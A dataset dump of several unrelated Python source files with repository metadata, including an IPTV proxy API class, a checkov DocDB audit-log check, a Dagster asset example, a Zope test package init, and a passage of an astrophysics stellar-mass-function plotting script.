| 34.074074 | 81 | 0.544565 | 298 | 2,760 | 4.916107 | 0.385906 | 0.027304 | 0.024573 | 0.032765 | 0.061433 | 0.061433 | 0.061433 | 0.061433 | 0.061433 | 0.061433 | 0 | 0.011429 | 0.365942 | 2,760 | 80 | 82 | 34.5 | 0.825714 | 0.153623 | 0 | 0.095238 | 0 | 0 | 0.051694 | 0 | 0 | 0 | 0 | 0.0125 | 0 | 1 | 0.047619 | false | 0 | 0.126984 | 0 | 0.222222 | 0.063492 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8188e19b101be322e95cf844a7e3d5f16f246e15 | 346 | py | Python | iptv_proxy/providers/beast/json_api.py | sfanous/IPTVProxy | 23047be01a229ef8f69ea6ca55185eae93adc56e | [
"MIT"
] | 9 | 2018-11-02T02:51:50.000Z | 2022-01-12T06:22:33.000Z | iptv_proxy/providers/beast/json_api.py | sfanous/IPTVProxy | 23047be01a229ef8f69ea6ca55185eae93adc56e | [
"MIT"
] | 3 | 2019-05-11T21:28:32.000Z | 2020-04-27T00:58:46.000Z | iptv_proxy/providers/beast/json_api.py | sfanous/IPTVProxy | 23047be01a229ef8f69ea6ca55185eae93adc56e | [
"MIT"
] | 7 | 2019-01-03T20:31:30.000Z | 2022-01-29T04:09:24.000Z | import logging
from iptv_proxy.providers.beast.constants import BeastConstants
from iptv_proxy.providers.iptv_provider.json_api import ProviderConfigurationJSONAPI
logger = logging.getLogger(__name__)
class BeastConfigurationJSONAPI(ProviderConfigurationJSONAPI):
__slots__ = []
_provider_name = BeastConstants.PROVIDER_NAME.lower()
| 26.615385 | 84 | 0.84104 | 34 | 346 | 8.117647 | 0.588235 | 0.057971 | 0.094203 | 0.15942 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098266 | 346 | 12 | 85 | 28.833333 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.428571 | 0 | 0.857143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
818d2b5226021a3473fd95143600b3a63ac484e1 | 869 | py | Python | checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py | niradler/checkov | 2628c6f28a5604efe3877d6eacc3044d2b66b7b1 | [
"Apache-2.0"
] | null | null | null | checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py | niradler/checkov | 2628c6f28a5604efe3877d6eacc3044d2b66b7b1 | [
"Apache-2.0"
] | 2 | 2022-03-07T07:15:32.000Z | 2022-03-21T07:21:17.000Z | checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py | niradler/checkov | 2628c6f28a5604efe3877d6eacc3044d2b66b7b1 | [
"Apache-2.0"
] | null | null | null | from checkov.cloudformation.checks.resource.base_resource_check import BaseResourceCheck
from checkov.common.parsers.node import DictNode
from checkov.common.models.enums import CheckResult, CheckCategories
class DocDBAuditLogs(BaseResourceCheck):
def __init__(self) -> None:
name = "Ensure DocDB has audit logs enabled"
id = "CKV_AWS_104"
supported_resources = ["AWS::DocDB::DBClusterParameterGroup"]
categories = [CheckCategories.LOGGING]
super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
def scan_resource_conf(self, conf: DictNode) -> CheckResult:
params = conf.get("Properties", {}).get("Parameters", {})
if params.get("audit_logs") == "enabled":
return CheckResult.PASSED
return CheckResult.FAILED
check = DocDBAuditLogs()
| 36.208333 | 106 | 0.721519 | 91 | 869 | 6.692308 | 0.549451 | 0.054187 | 0.055829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00419 | 0.176064 | 869 | 23 | 107 | 37.782609 | 0.846369 | 0 | 0 | 0 | 0 | 0 | 0.135788 | 0.040276 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.0625 | 0.1875 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
8195c711df03d29790fdcc4e7f130ef66986f549 | 788 | py | Python | examples/simple_lakehouse/simple_lakehouse/assets.py | bitdotioinc/dagster | 4fe395a37b206b1a48b956fa5dd72bf698104cca | [
"Apache-2.0"
] | 2 | 2021-06-21T17:50:26.000Z | 2021-06-21T19:14:23.000Z | examples/simple_lakehouse/simple_lakehouse/assets.py | bitdotioinc/dagster | 4fe395a37b206b1a48b956fa5dd72bf698104cca | [
"Apache-2.0"
] | 7 | 2022-03-16T06:55:04.000Z | 2022-03-18T07:03:25.000Z | examples/simple_lakehouse/simple_lakehouse/assets.py | bitdotioinc/dagster | 4fe395a37b206b1a48b956fa5dd72bf698104cca | [
"Apache-2.0"
] | 1 | 2021-08-18T17:21:57.000Z | 2021-08-18T17:21:57.000Z | """Asset definitions for the simple_lakehouse example."""
import pandas as pd
from lakehouse import Column, computed_table, source_table
from pyarrow import date32, float64, string
sfo_q2_weather_sample_table = source_table(
path="data", columns=[Column("tmpf", float64()), Column("valid_date", string())],
)
@computed_table(
input_assets=[sfo_q2_weather_sample_table],
columns=[Column("valid_date", date32()), Column("max_tmpf", float64())],
)
def daily_temperature_highs_table(sfo_q2_weather_sample: pd.DataFrame) -> pd.DataFrame:
"""Computes the temperature high for each day"""
sfo_q2_weather_sample["valid_date"] = pd.to_datetime(sfo_q2_weather_sample["valid"])
return sfo_q2_weather_sample.groupby("valid_date").max().rename(columns={"tmpf": "max_tmpf"})
| 41.473684 | 97 | 0.757614 | 108 | 788 | 5.194444 | 0.435185 | 0.053476 | 0.128342 | 0.192513 | 0.163993 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022695 | 0.10533 | 788 | 18 | 98 | 43.777778 | 0.77305 | 0.119289 | 0 | 0 | 0 | 0 | 0.106881 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.230769 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8197395414f35f5a57891af7ddfab20969d9cd9f | 301 | py | Python | 17-files/read-file-with-try-block.py | johnehunt/Python3Intro | 2a41ce488aac11bb3928ea81e57be1c2c8acdac2 | [
"Apache-2.0"
] | 1 | 2020-11-03T19:46:25.000Z | 2020-11-03T19:46:25.000Z | 14-files/read-file-with-try-block.py | johnehunt/PythonIntroDS | 7e9d5c5494191cd68bc71e140df5fb30290a8da6 | [
"Apache-2.0"
] | null | null | null | 14-files/read-file-with-try-block.py | johnehunt/PythonIntroDS | 7e9d5c5494191cd68bc71e140df5fb30290a8da6 | [
"Apache-2.0"
] | 1 | 2019-09-21T08:24:46.000Z | 2019-09-21T08:24:46.000Z | # Illustrates combining exception / error handling
# with file access
print('Start')
try:
with open('myfile2.txt', 'r') as f:
lines = f.readlines()
for line in lines:
print(line, end='')
except FileNotFoundError as err:
print('oops')
print(err)
print('Done')
| 20.066667 | 50 | 0.61794 | 38 | 301 | 4.894737 | 0.736842 | 0.086022 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004444 | 0.252492 | 301 | 14 | 51 | 21.5 | 0.822222 | 0.215947 | 0 | 0 | 0 | 0 | 0.107296 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
819bd18a4722e9a3211561882e51cf2324399bde | 1,693 | py | Python | src/Testing/ZopeTestCase/__init__.py | tseaver/Zope-RFA | 08634f39b0f8b56403a2a9daaa6ee4479ef0c625 | [
"ZPL-2.1"
] | 2 | 2015-12-21T10:34:56.000Z | 2017-09-24T11:07:58.000Z | src/Testing/ZopeTestCase/__init__.py | MatthewWilkes/Zope | 740f934fc9409ae0062e8f0cd6dcfd8b2df00376 | [
"ZPL-2.1"
] | null | null | null | src/Testing/ZopeTestCase/__init__.py | MatthewWilkes/Zope | 740f934fc9409ae0062e8f0cd6dcfd8b2df00376 | [
"ZPL-2.1"
] | null | null | null | ##############################################################################
#
# Copyright (c) 2005 Zope Foundation and Contributors.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Names exported by the ZopeTestCase package
"""
import ZopeLite as Zope2
import utils
import layer
from ZopeLite import hasProduct
from ZopeLite import installProduct
from ZopeLite import hasPackage
from ZopeLite import installPackage
from ZopeLite import _print
from ZopeTestCase import folder_name
from ZopeTestCase import user_name
from ZopeTestCase import user_password
from ZopeTestCase import user_role
from ZopeTestCase import standard_permissions
from ZopeTestCase import ZopeTestCase
from ZopeTestCase import FunctionalTestCase
from PortalTestCase import portal_name
from PortalTestCase import PortalTestCase
from sandbox import Sandboxed
from functional import Functional
from base import TestCase
from base import app
from base import close
from warnhook import WarningsHook
from unittest import main
from zopedoctest import ZopeDocTestSuite
from zopedoctest import ZopeDocFileSuite
from zopedoctest import FunctionalDocTestSuite
from zopedoctest import FunctionalDocFileSuite
import zopedoctest as doctest
import transaction
import placeless
Zope = Zope2
| 29.189655 | 78 | 0.759598 | 197 | 1,693 | 6.492386 | 0.472081 | 0.087568 | 0.120407 | 0.060985 | 0.046912 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005416 | 0.127584 | 1,693 | 57 | 79 | 29.701754 | 0.860528 | 0.282339 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.03125 | 0.96875 | 0 | 0.96875 | 0.03125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
81afed5d2a7be68d968744aa55c07d3f1c78d48b | 241,016 | py | Python | output/myresults.py | jacobseiler/rsage | b3b0a3fa3c676eab188991e37d06894396bfc74f | [
"MIT"
] | 1 | 2019-05-23T04:11:32.000Z | 2019-05-23T04:11:32.000Z | output/myresults.py | jacobseiler/rsage | b3b0a3fa3c676eab188991e37d06894396bfc74f | [
"MIT"
] | 7 | 2018-08-17T05:04:57.000Z | 2019-01-16T05:40:16.000Z | output/myresults.py | jacobseiler/rsage | b3b0a3fa3c676eab188991e37d06894396bfc74f | [
"MIT"
] | null | null | null | #!/usr/bin/env python
from __future__ import print_function
import matplotlib
matplotlib.use('Agg')
import os
import heapq
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.colors as colors
import matplotlib.cm as cm
from numpy import *
from random import sample, seed, randint
from os.path import getsize as getFileSize
import math
import random
import csv
from cycler import cycler
from io import StringIO
#np.set_printoptions(threshold=np.nan)
from collections import Counter
from matplotlib.colors import LogNorm
from mpl_toolkits.axes_grid1 import AxesGrid
from astropy import units as u
from astropy import cosmology
import matplotlib.ticker as mtick
import PlotScripts
import ReadScripts
import AllVars
import GalaxyPhotoion as photo
import ObservationalData as Obs
import gnedin_analytic as ga
from mpi4py import MPI
import sys
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
AllVars.Set_Params_Kali()
AllVars.Set_Constants()
PlotScripts.Set_Params_Plot()
output_format = ".png"
# For the Tiamat extended results there is a weird hump when calculating the escape fraction.
# This hump occurs at a halo mass of approximately 10.3.
# The calculation of fesc skips this hump range (defined from kink_low to kink_high)
kink_low = 10.3
kink_high = 10.30000001
m_low = 7.0 # We only sum the photons coming from halos within the mass range m_low < Halo Mass < m_high
m_high = 15.0
m_gal_low = 3.0
m_gal_high = 12.0
m_low_SAGE = pow(10, m_low)/1.0e10 * AllVars.Hubble_h
m_high_SAGE = pow(10, m_high)/1.0e10 * AllVars.Hubble_h
bin_width = 0.2
NB = int((m_high - m_low) / bin_width)
NB_gal = int((m_gal_high - m_gal_low) / bin_width)
fej_low = 0.0
fej_high = 1.0
fej_bin_width = 0.05
NB_fej = int((fej_high - fej_low) / fej_bin_width)
def raise_list_power(my_list, n):
return [pow(x, n) for x in my_list]
def raise_power_list(my_list, n):
return [pow(n, x) for x in my_list]
def calculate_beta(MUV, z):
'''
Calculation of the dust attenuation parameter Beta. Fit values are from Bouwens (2015) ApJ 793, 115.
For z = 5 and 6, Bouwens uses a piece-wise linear relationship and a linear relationship for higher redshift. ##
Parameters
----------
MUV : `float'
A value of the absolute magnitude in the UV (generally M1600) in the AB magnitude system.
z : `float'
Redshift the attenuation is calculated at.
Returns
------
beta : `float'
Value of the UV continuum paramaeter beta.
'''
if (z >= 4.5 and z < 5.5): # z = 5 fits.
if (MUV > -18.8):
dB = -0.08
else:
dB = -0.17
B = -2.05
offset = 18.8
elif (z >= 5.5 and z < 6.5): # z = 6 fits.
if (MUV > -18.8):
dB = -0.08
else:
dB = -0.24
B = -2.22
offset = 18.8
elif (z >= 6.5 and z < 7.5): # z = 7 fits.
dB = -0.20
B = -2.05
offset = 19.5
elif (z >= 7.5 and z < 8.5): # z = 8 fits.
dB = -0.15
B = -2.13
offset = 19.5
elif (z >= 8.5 and z < 9.5): # z = 9 fits.
dB = -0.16
B = -2.19
offset = 19.5
elif (z >= 9.5 and z < 10.5): # z = 10 fits.
dB = -0.16
B = -2.16
offset = 19.5
beta = dB * (MUV + offset) + B
return beta
def multiply(array):
'''
Performs element wise multiplication.
Parameters
----------
array : `~numpy.darray'
The array to be multiplied.
Returns
-------
total : `float'
Total of the elements multiplied together.
'''
total = 1
for i in range(0, len(array)):
total *= array[i]
return total
##
def Sum_Log(array):
'''
Performs an element wise sum of an array who's elements are in log-space.
Parameters
----------
array : array
Array with elements in log-space.
Returns
------
sum_total : float
Value of the elements taken to the power of 10 and summed.
Units
-----
All units are kept the same as the inputs.
'''
sum_total = 0.0
for i in range(0, len(array)):
sum_total += 10**array[i]
return sum_total
##
def Std_Log(array, mean):
'''
Calculates the standard deviation of an array with elements in log-space.
Parameters
----------
array : array
Array with elements in log-space.
mean : float
Mean of the array (not in log).
Returns
------
std : float
Standard deviation of the input array taken to the power of 10.
Units
-----
All units are kept the same as the inputs.
'''
sum_total = 0.0
for i in range(0, len(array)):
sum_total += (10**array[i] - mean)**2
sum_total *= 1.0/len(array)
std = np.sqrt(sum_total)
return std
###
def collect_across_tasks(mean_per_task, std_per_task, N_per_task, SnapList,
BinSnapList=[], binned=False, m_bin_low=0.0,
m_bin_high=0.0, my_bin_width=bin_width):
"""
Reduces arrays that are unique to each task onto the master task.
The dimensions of the input arrays will change slightly if we are collecting a statistics
that is binned across e.g., halo mass or galaxy stellar mass.
Parameters
----------
mean_per_task, std_per_task, N_per_task: Nested 2D (or 3D if binned == True) arrays of floats.
Outer length is equal to the number of models.
Inner length is equal to the number of snapshots the data has been calculated for.
Most inner length is equal to the number of bins.
Contains the mean/standard deviation/number of objects unique for each task.
SnapList: Nested 2D arrays of integers. Outer length is equal to the number of models.
Contains the snapshot numbers the data has been calculated for each model.
BinSnapList: Nested 2D arrays of integers. Outer length is equal to the number of models.
Often statistics are calculated for ALL snapshots but we only wish to plot for a subset of snapshots.
This variable allows the binned data to be collected for only a subset of the snapshots.
binned: Boolean.
Dictates whether the collected data is a 2D or 3D array with the inner-most array being binned across e.g., halo mass.
Returns
----------
master_mean, master_std, master_N: Nested 2D (or 3D if binned == True) arrays of floats.
Shape is identical to the input mean_per_task etc.
If rank == 0 these contain the collected statistics.
Otherwise these will be none.
master_bin_middle: Array of floats.
Contains the location of the middle of the bins for the data.
"""
master_mean = []
master_std = []
master_N = []
master_bin_middle = []
for model_number in range(0, len(SnapList)):
master_mean.append([])
master_std.append([])
master_N.append([])
master_bin_middle.append([])
# If we're collecting a binned statistic (e.g., binned across halo mass), then we need to perform the collecting per snapshot.
if binned:
count = 0
for snapshot_idx in range(len(SnapList[model_number])):
if SnapList[model_number][snapshot_idx] == BinSnapList[model_number][count]:
master_mean[model_number], master_std[model_number], master_N[model_number] = calculate_pooled_stats(master_mean[model_number], master_std[model_number], master_N[model_number], mean_per_task[model_number][snapshot_idx], std_per_task[model_number][snapshot_idx], N_per_task[model_number][snapshot_idx])
master_bin_middle[model_number].append(np.arange(m_bin_low,
m_bin_high+my_bin_width,
my_bin_width)[:-1]
+ my_bin_width* 0.5)
count += 1
if count == len(BinSnapList[model_number]):
break
else:
master_mean[model_number], master_std[model_number], master_N[model_number] = calculate_pooled_stats(master_mean[model_number], master_std[model_number], master_N[model_number],
mean_per_task[model_number], std_per_task[model_number],
N_per_task[model_number])
if rank == 0:
master_mean[model_number] = master_mean[model_number][0]
master_std[model_number] = master_std[model_number][0]
master_N[model_number] = master_N[model_number][0]
return master_mean, master_std, master_N, master_bin_middle
###
def calculate_pooled_stats(mean_pool, std_pool, N_pool, mean_local, std_local, N_local):
'''
Calculates the pooled mean and standard deviation from multiple processors and appends it to an input array.
Formulae taken from https://en.wikipedia.org/wiki/Pooled_variance
As we only care about these stats on the rank 0 process, we make use of junk inputs/outputs for other ranks.
NOTE: Since the input data may be an array (e.g. pooling the mean/std for a stellar mass function).
Parameters
----------
mean_pool, std_pool, N_pool : array of floats.
Arrays that contain the current pooled means/standard deviation/number of data points (for rank 0) or just a junk input (for other ranks).
mean_local, mean_std : float or array of floats.
The non-pooled mean and standard deviation unique for each process.
N_local : floating point number or array of floating point numbers.
Number of data points used to calculate the mean/standard deviation that is going to be added to the pool.
NOTE: Use floating point here so we can use MPI.DOUBLE for all MPI functions.
Returns
-------
mean_pool, std_pool : array of floats.
Original array with the new pooled mean/standard deviation appended (for rank 0) or the new pooled mean/standard deviation only (for other ranks).
Units
-----
All units are the same as the input.
All inputs MUST BE real-space (not log-space).
'''
if isinstance(mean_local, list) == True:
if len(mean_local) != len(std_local):
print("len(mean_local) = {0} \t len(std_local) = {1}".format(len(mean_local), len(std_local)))
raise ValueError("Lengths of mean_local and std_local should be equal")
if ((type(mean_local).__module__ == np.__name__) == True or (isinstance(mean_local, list) == True)): # Checks to see if we are dealing with arrays.
N_times_mean_local = np.multiply(N_local, mean_local)
N_times_var_local = np.multiply(N_local, np.multiply(std_local, std_local))
N_local = np.array(N_local).astype(float)
N_times_mean_local = np.array(N_times_mean_local).astype(np.float32)
if rank == 0: # Only rank 0 holds the final arrays so only it requires proper definitions.
N_times_mean_pool = np.zeros_like(N_times_mean_local)
N_pool_function = np.zeros_like(N_local)
N_times_var_pool = np.zeros_like(N_times_var_local)
N_times_mean_pool = N_times_mean_pool.astype(np.float64) # Recast everything to double precision then use MPI.DOUBLE.
N_pool_function = N_pool_function.astype(np.float64)
N_times_var_pool = N_times_var_pool.astype(np.float64)
else:
N_times_mean_pool = None
N_pool_function = None
N_times_var_pool = None
comm.Barrier()
N_times_mean_local = N_times_mean_local.astype(np.float64)
N_local = N_local.astype(np.float64)
N_times_var_local = N_times_var_local.astype(np.float64)
comm.Reduce([N_times_mean_local, MPI.DOUBLE], [N_times_mean_pool, MPI.DOUBLE], op = MPI.SUM, root = 0) # Sum the arrays across processors.
comm.Reduce([N_local, MPI.DOUBLE],[N_pool_function, MPI.DOUBLE], op = MPI.SUM, root = 0)
comm.Reduce([N_times_var_local, MPI.DOUBLE], [N_times_var_pool, MPI.DOUBLE], op = MPI.SUM, root = 0)
else:
N_times_mean_local = N_local * mean_local
N_times_var_local = N_local * std_local * std_local
N_times_mean_pool = comm.reduce(N_times_mean_local, op = MPI.SUM, root = 0)
N_pool_function = comm.reduce(N_local, op = MPI.SUM, root = 0)
N_times_var_pool = comm.reduce(N_times_var_local, op = MPI.SUM, root = 0)
if rank == 0:
mean_pool_function = np.zeros((len(N_pool_function)))
std_pool_function = np.zeros((len(N_pool_function)))
for i in range(0, len(N_pool_function)):
if N_pool_function[i] == 0:
mean_pool_function[i] = 0.0
else:
mean_pool_function[i] = np.divide(N_times_mean_pool[i], N_pool_function[i])
if N_pool_function[i] < 3:
std_pool_function[i] = 0.0
else:
std_pool_function[i] = np.sqrt(np.divide(N_times_var_pool[i], N_pool_function[i]))
mean_pool.append(mean_pool_function)
std_pool.append(std_pool_function)
N_pool.append(N_pool_function)
return mean_pool, std_pool, N_pool
else:
return mean_pool, std_pool, N_pool_function # Junk return because non-rank 0 doesn't care.
##
def StellarMassFunction(SnapList, SMF, simulation_norm, FirstFile, LastFile, NumFile, ResolutionLimit_mean, model_tags, observations, paper_plot, output_tag):
'''
Calculates the stellar mass function for given galaxies with the option to overplot observations by Song et al. (2013) at z = 6, 7, 8 and/or Baldry et al. (2008) at z = 0.1.
Parallel compatible.
NOTE: The plotting assumes the redshifts we are plotting at are (roughly) the same for each model.
Parameters
---------
SnapList : Nested 'array-like`, SnapList[model_number0] = [snapshot0_model0, ..., snapshotN_model0], with length equal to the number of models.
Snapshots that we plot the stellar mass function at for each model.
SMF : Nested 2-dimensional array, SMF[model_number0][snapshot0] = [bin0galaxies, ..., binNgalaxies], with length equal to the number of bins (NB_gal).
The count of galaxies within each stellar mass bin. Bounds are given by 'm_gal_low' and 'm_gal_high' in bins given by 'bin_width'.
simulation_norm : array with length equal to the number of models.
Denotes which simulation each model uses.
0 : MySim
1 : Mini-Millennium
2 : Tiamat (down to z = 5)
3 : Extended Tiamat (down to z = 1.6ish).
4 : Britton's Simulation
5 : Kali
FirstFile, LastFile, NumFile : array of integers with length equal to the number of models.
The file numbers for each model that were read in (defined by the range between [FirstFile, LastFile] inclusive) and the TOTAL number of files for this model (we may only be plotting a subset of the volume).
ResolutionLimit_mean : array of floats with the same shape as SMF.
This is the mean stellar mass for a halo with len (number of N-body simulation particles) between 'stellar_mass_halolen_lower' and 'stellar_mass_halolen_upper'.
model_tags : array of strings with length equal to the number of models.
Strings that contain the tag for each model. Will be placed on the plot.
observations : int
Denotes whether we want to overplot observational results.
0 : Don't plot anything.
1 : Plot Song et al. (2016) at z = 6, 7, 8.
2 : Plot Baldry et al. (2008) at z = 0.1.
3 : Plot both of these.
paper_plot : int
Denotes whether we want to split the plotting over three panels (z = 6, 7, 8) for the paper or keep it all to one figure.
output_tag : string
Name of the file that will be generated. File will be saved in the current directory with the output format defined by the 'output_format' variable at the beggining of the file.
Returns
-------
No returns.
Generates and saves the plot (named via output_tag).
Units
-----
Stellar Mass is in units of log10(Msun).
'''
## Empty array initialization ##
title = []
normalization_array = []
redshift_labels = []
counts_array = []
bin_middle_array = []
for model_number in range(0, len(SnapList)):
counts_array.append([])
bin_middle_array.append([])
redshift_labels.append([])
####
for model_number in range(0, len(SnapList)): # Does this for each of the models.
## Normalization for each model. ##
if (simulation_norm[model_number] == 0):
AllVars.Set_Params_Mysim()
elif (simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif (simulation_norm[model_number] == 2):
AllVars.Set_Params_Tiamat()
elif (simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif (simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
box_factor = (LastFile[model_number] - FirstFile[model_number] + 1.0)/(NumFile[model_number]) # This factor allows us to take a sub-volume of the box and scale the results to represent the entire box.
print("We are creating the stellar mass function using {0:.4f} of the box's volume.".format(box_factor))
norm = pow(AllVars.BoxSize,3) / pow(AllVars.Hubble_h, 3) * bin_width * box_factor
normalization_array.append(norm)
####
for snapshot_idx in range(0, len(SnapList[model_number])): # Loops for each snapshot in each model.
tmp = 'z = %.2f' %(AllVars.SnapZ[SnapList[model_number][snapshot_idx]]) # Assigns a redshift label.
redshift_labels[model_number].append(tmp)
## We perform the plotting on Rank 0 so only this rank requires the final counts array. ##
if rank == 0:
counts_total = np.zeros_like(SMF[model_number][snapshot_idx])
else:
counts_total = None
comm.Reduce([SMF[model_number][snapshot_idx], MPI.FLOAT], [counts_total, MPI.FLOAT], op = MPI.SUM, root = 0) # Sum all the stellar mass and pass to Rank 0.
if rank == 0:
counts_array[model_number].append(counts_total)
bin_middle_array[model_number].append(np.arange(m_gal_low, m_gal_high+bin_width, bin_width)[:-1] + bin_width * 0.5)
####
## Plotting ##
if rank == 0: # Plot only on rank 0.
if paper_plot == 0:
f = plt.figure()
ax = plt.subplot(111)
for model_number in range(0, len(SnapList)):
for snapshot_idx in range(0, len(SnapList[model_number])):
if model_number == 0: # We assume the redshifts for each model are the same, we only want to put a legend label for each redshift once.
title = redshift_labels[model_number][snapshot_idx]
else:
title = ''
plt.plot(bin_middle_array[model_number][snapshot_idx], counts_array[model_number][snapshot_idx] / normalization_array[model_number], color = PlotScripts.colors[snapshot_idx], linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = title, linewidth = PlotScripts.global_linewidth)
#print(np.min(np.log10(ResolutionLimit_mean)))
#ax.axvline(np.max(np.log10(ResolutionLimit_mean)), color = 'k', linewidth = PlotScripts.global_linewidth, linestyle = '--')
#ax.text(np.max(np.log10(ResolutionLimit_mean)) + 0.1, 1e-3, "Resolution Limit", color = 'k')
for model_number in range(0, len(SnapList)): # Place legend labels for each of the models. NOTE: Placed after previous loop for proper formatting of labels.
plt.plot(1e100, 1e100, color = 'k', linestyle = PlotScripts.linestyles[model_number], label = model_tags[model_number], rasterized=True, linewidth = PlotScripts.global_linewidth)
## Adjusting axis labels/limits. ##
plt.yscale('log', nonposy='clip')
plt.axis([6, 11.5, 1e-6, 1e-0])
ax.set_xlabel(r'$\log_{10}\ m_{\mathrm{*}} \:[M_{\odot}]$', fontsize = PlotScripts.global_fontsize)
ax.set_ylabel(r'$\Phi\ [\mathrm{Mpc}^{-3}\: \mathrm{dex}^{-1}]$', fontsize = PlotScripts.global_fontsize)
ax.xaxis.set_minor_locator(plt.MultipleLocator(0.25))
ax.set_xticks(np.arange(6.0, 12.0))
if (observations == 1 or observations == 3): # If we wanted to plot Song.
Obs.Get_Data_SMF()
delta = 0.05
caps = 5
## Song (2016) Plotting ##
plt.errorbar(Obs.Song_SMF_z6[:,0], 10**Obs.Song_SMF_z6[:,1], yerr= (10**Obs.Song_SMF_z6[:,1] - 10**Obs.Song_SMF_z6[:,3], 10**Obs.Song_SMF_z6[:,2] - 10**Obs.Song_SMF_z6[:,1]), xerr = 0.25, capsize = caps, elinewidth = PlotScripts.global_errorwidth, alpha = 1.0, lw=2.0, marker='o', ls='none', label = 'Song 2015, z = 6', color = PlotScripts.colors[0], rasterized=True)
plt.errorbar(Obs.Song_SMF_z7[:,0], 10**Obs.Song_SMF_z7[:,1], yerr= (10**Obs.Song_SMF_z7[:,1] - 10**Obs.Song_SMF_z7[:,3], 10**Obs.Song_SMF_z7[:,2] - 10**Obs.Song_SMF_z7[:,1]), xerr = 0.25, capsize = caps, alpha=0.75, elinewidth = PlotScripts.global_errorwidth, lw=1.0, marker='o', ls='none', label = 'Song 2015, z = 7', color = PlotScripts.colors[1], rasterized=True)
plt.errorbar(Obs.Song_SMF_z8[:,0], 10**Obs.Song_SMF_z8[:,1], yerr= (10**Obs.Song_SMF_z8[:,1] - 10**Obs.Song_SMF_z8[:,3], 10**Obs.Song_SMF_z8[:,2] - 10**Obs.Song_SMF_z8[:,1]), xerr = 0.25, capsize = caps, alpha=0.75, elinewidth = PlotScripts.global_errorwidth, lw=1.0, marker='o', ls='none', label = 'Song 2015, z = 8', color = PlotScripts.colors[2], rasterized=True)
####
if ((observations == 2 or observations == 3) and rank == 0): # If we wanted to plot Baldry.
Baldry_xval = np.log10(10 ** Obs.Baldry_SMF_z0[:, 0] /AllVars.Hubble_h/AllVars.Hubble_h)
Baldry_xval = Baldry_xval - 0.26 # convert back to Chabrier IMF
Baldry_yvalU = (Obs.Baldry_SMF_z0[:, 1]+Obs.Baldry_SMF_z0[:, 2]) * AllVars.Hubble_h*AllVars.Hubble_h*AllVars.Hubble_h
Baldry_yvalL = (Obs.Baldry_SMF_z0[:, 1]-Obs.Baldry_SMF_z0[:, 2]) * AllVars.Hubble_h*AllVars.Hubble_h*AllVars.Hubble_h
plt.fill_between(Baldry_xval, Baldry_yvalU, Baldry_yvalL,
facecolor='purple', alpha=0.25, label='Baldry et al. 2008 (z=0.1)')
####
leg = plt.legend(loc='lower left', numpoints=1, labelspacing=0.1)
